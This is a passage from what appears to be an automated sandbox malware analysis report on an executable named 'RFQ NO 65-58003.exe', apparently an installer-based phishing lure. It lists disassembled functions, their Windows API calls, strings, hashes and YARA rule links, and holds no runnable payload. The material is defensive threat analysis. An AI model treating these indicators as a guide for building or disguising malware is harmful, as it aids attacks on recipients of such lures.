                                                              • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
                                                              • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                              • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
                                                              Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401DB6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                              • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID: Tahoma
                                                              • API String ID: 3808545654-3580928618
                                                              • Opcode ID: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
                                                              • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
                                                              • Opcode Fuzzy Hash: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
                                                              • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D
                                                              Function 00402D98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
                                                              • wsprintfW.USER32 ref: 00402DEA
                                                              • SetWindowTextW.USER32(?,?), ref: 00402DFA
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                              • API String ID: 1451636040-1158693248
                                                              • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                              • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
                                                              • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                              • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
                                                              Function 004028C3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                                              • GlobalFree.KERNEL32(?), ref: 0040296C
                                                              • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                              • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
                                                              • Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                              • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
                                                              Function 00404B2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                              • wsprintfW.USER32 ref: 00404BD7
                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s$(7B
                                                              • API String ID: 3540041739-1320723960
                                                              • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                              • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
                                                              • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                              • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
                                                              Function 00402C93 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402CB4
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Close$DeleteEnumOpen
                                                              • String ID:
                                                              • API String ID: 1912718029-0
                                                              • Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                              • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
                                                              • Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                              • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
                                                              Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                              • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
                                                              • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                              • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
                                                              Function 004025AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 004025FE
                                                              • lstrlenA.KERNEL32(loyolism,?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 00402609
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidelstrlen
                                                              • String ID: loyolism
                                                              • API String ID: 3109718747-2838521280
                                                              • Opcode ID: 91cc700c78dfe4b07254198256f44d4729cb2cbe27dddbc7cc6f12c5bdf8e3c1
                                                              • Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
                                                              • Opcode Fuzzy Hash: 91cc700c78dfe4b07254198256f44d4729cb2cbe27dddbc7cc6f12c5bdf8e3c1
                                                              • Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E
                                                              Function 00405BC6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-3936084776
                                                              • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                              • Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
                                                              • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                              • Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE
                                                              Function 00403D31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$1033
                                                              • API String ID: 530164218-2544948282
                                                              • Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                              • Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
                                                              • Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                              • Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9
                                                              Function 004052E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00405314
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
                                                                • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                              • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
                                                              • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                              • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
                                                              Function 00405C12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ NO 65-58003.exe,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405C18
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ NO 65-58003.exe,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405C28
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-3125694417
                                                              • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                              • Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
                                                              • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                              • Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD
                                                              Function 00405D4C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
                                                              • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                              Memory Dump Source
